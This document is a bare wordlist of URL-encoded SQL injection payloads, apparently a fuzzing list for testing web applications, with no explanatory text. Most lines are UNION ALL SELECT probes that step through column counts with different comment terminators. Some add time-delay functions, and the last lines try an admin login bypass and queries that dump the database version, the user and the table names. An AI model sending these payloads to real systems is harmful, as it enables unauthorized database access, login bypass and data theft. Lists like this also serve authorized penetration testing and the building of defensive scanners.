UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20NULL--
UNION%20ALL%20SELECT%20NULL%23
UNION%20ALL%20SELECT%20NULL
UNION%20ALL%20SELECT%20CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%2899%29%2BCHAR%2873%29%2BCHAR%2866%29%2BCHAR%28109%29%2BCHAR%28119%29%2BCHAR%2881%29%2BCHAR%28108%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28113%29%2CNULL--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30--
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%23
UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%23
1234%20%27%20AND%201%3D0%20UNION%20ALL%20SELECT%20%27admin%27%2C%20%2781dc9bdb52d04dc20036dbd8313ed055
1234%20%22%20AND%201%3D0%20UNION%20ALL%20SELECT%20%22admin%22%2C%20%2281dc9bdb52d04dc20036dbd8313ed055
%27%20AND%201%3D0%20UNION%20ALL%20SELECT%20%27%27%2C%20%2781dc9bdb52d04dc20036dbd8313ed055
%22%20AND%201%3D0%20UNION%20ALL%20SELECT%20%22%22%2C%20%2281dc9bdb52d04dc20036dbd8313ed055
%27%20UNION%20ALL%20SELECT%201%2C%20%40%40version%3B%23
%27%20UNION%20ALL%20SELECT%20system_user%28%29%2Cuser%28%29%3B%23
%27%20UNION%20select%20table_schema%2Ctable_name%20FROM%20information_Schema.tables%3B%23